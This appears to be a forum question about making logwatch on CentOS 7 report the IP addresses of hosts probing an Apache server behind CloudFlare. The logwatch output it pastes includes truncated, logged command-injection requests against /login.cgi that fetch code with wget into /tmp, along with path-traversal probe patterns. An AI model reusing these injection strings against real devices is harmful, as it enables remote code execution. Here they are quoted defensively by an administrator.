# Configure logwatch on CentOS 7 with apache httpd behind CloudFlare

Tags: centos7, logwatch

How do I get logwatch to output the IP addresses that probe my http server? It does not seem to output IP addresses although they are shown in the apache logs.

```
################### Logwatch 7.4.0 (03/01/11) ####################
        Processing Initiated: Thu Aug  2 10:08:53 2018
        Date Range Processed: yesterday
                              ( 2018-Aug-01 )
                              Period is day.
        Detail Level of Output: 10
        Type of Output/Format: stdout / text
        Logfiles for Host: ssbl
 ##################################################################

 --------------------- httpd Begin ------------------------

 996.79 MB transferred in 66405 responses  (1xx 0, 2xx 62932, 3xx 2341, 4xx 1027, 5xx 105)
     4775 Images (484.47 MB),
       23 Documents (0.05 MB),
       66 Archives (0.00 MB),
      165 Sound files (17.88 MB),
    13024 Content pages (86.44 MB),
     1441 Redirects (0.07 MB),
       31 Various Logs (0.46 MB),
       14 Fonts (1.35 MB),
    46866 Other (406.06 MB)

 Attempts to use known hacks by 1 hosts were logged 9 time(s) from:
    -: 9 Time(s)
       passwd$ 5 Time(s)
       /\.\./\.\./\.\./ 3 Time(s)
       ^null$ 1 Time(s)

 A total of 1 sites probed the server
    -

 Requests with error response codes
    400 Bad Request
       /login.cgi?cli=aa%20aa%27;wget%20http://18 ... h%20/tmp/hk%27$: 1 Time(s)
       /login.cgi?cli=aa%20aa%27;wget%20http://46 ... h%20/tmp/hk%27$: 1 Time(s)
       /login.cgi?cli=aa%20aa%27;wget%20http://ha ... h%20/tmp/hk%27$: 1 Time(s)
       /login.cgi?cli=aa%20aa%27;wget%20http://xo ... 20/tmp/xoxo%27$: 1 Time(s)
    401 Unauthorized
       /: 47 Time(s)
```

... and thousands more entries.

My apache log format:

```
LogFormat "%h %l %{Host}i %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\"" combined
```

I've set the same format inside services/http.conf

Comment: That looks like a normal logwatch email. It doesn't show IP addresses there by default.

Comment: Thanks Michael, yes, it does not, so I'd like to be able to see the IP addresses so I can script out curl to block them in the cloudflare firewall.

Comment: You should probably parse the logfiles yourself, then. It'll be less work than trying to modify the logwatch email and parse that.